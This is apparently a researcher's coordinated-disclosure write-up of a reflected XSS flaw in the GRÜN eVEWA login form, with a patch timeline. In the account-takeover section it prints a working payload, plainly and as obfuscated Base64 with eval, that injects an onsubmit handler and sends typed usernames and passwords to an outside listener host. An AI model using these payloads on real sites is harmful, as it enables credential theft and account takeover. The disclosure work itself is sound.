TL;DR

GRÜN eVEWA Community versions 31 to 53 were susceptible to a reflected cross-site scripting (rXSS) vulnerability in the login form. An attacker who gets a user to open a crafted login URL can run JavaScript in that user's browser and capture the credentials entered into the form, leading to account takeover. To address this issue, a security patch labelled "H1" has been applied across versions 31 to 53.

Initial Findings

During my investigation of a domain, I stumbled upon a GRÜN eVEWA site. While examining its endpoints, I identified a reflected XSS in the file parameter at the following locations:

evewa3ajax.php?file=
evewa3/evewa3ajax.php?file=

Login Panel

Revisiting the login panel, I found that the request path itself is reflected into the HTML of the login form without encoding. Appending a closing quote and a script tag to the path is therefore enough to inject JavaScript into the page:

/evewa3ajax.php%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E

Account Takeover (ATO)

Because the path lands inside the form tag, the injection can close the attribute it is reflected into and add an onsubmit handler to the form. That handler runs whenever the login button is clicked and silently sends the credentials the user has just typed to an attacker-controlled host. The impact is disclosure of valid user credentials and, with them, unauthorized access to the affected accounts.

The out-of-band (OOB) payload requests an image from an attacker-controlled listener, smuggling the username (form element 1) and password (form element 2) out in the query string:

new Image().src="https://jrelf1m8qnwtv2zteql6r62jiao1cv0k.oastify.com/bogus.php?output=U:"+document.forms[0].elements[1].value+"!P:"+document.forms[0].elements[2].value

To keep the quotes in that snippet from breaking the injected attribute, the payload is Base64-encoded and decoded at runtime with atob inside an eval call in the onsubmit handler. After URL-encoding, the final request path looks like this:

/%22%20onsubmit%3d%22eval(atob('bmV3IEltYWdlKCkuc3JjPSJodHRwczovL2pyZWxmMW04cW53dHYyenRlcWw2cjYyamlhbzFjdjBrLm9hc3RpZnkuY29tL2JvZ3VzLnBocD9vdXRwdXQ9VToiK2RvY3VtZW50LmZvcm1zWzBdLmVsZW1lbnRzWzFdLnZhbHVlKyIhUDoiK2RvY3VtZW50LmZvcm1zWzBdLmVsZW1lbnRzWzJdLnZhbHVl'));

Timeline

Date Event
2023.01.28 Vulnerability reported to Federal Office for Information Security (BSI) through their Coordinated Vulnerability Disclosure (CVD) process.
2023.01.30 Acknowledgement received from BSI.
2023.01.31 Acknowledgement received from GRÜN.
2023.02.02 Information disseminated to GRÜN customers, and patch rollout initiated.
2023.03.08 Patch H1 successfully deployed to all customers; no customers were compromised by the reported vulnerability.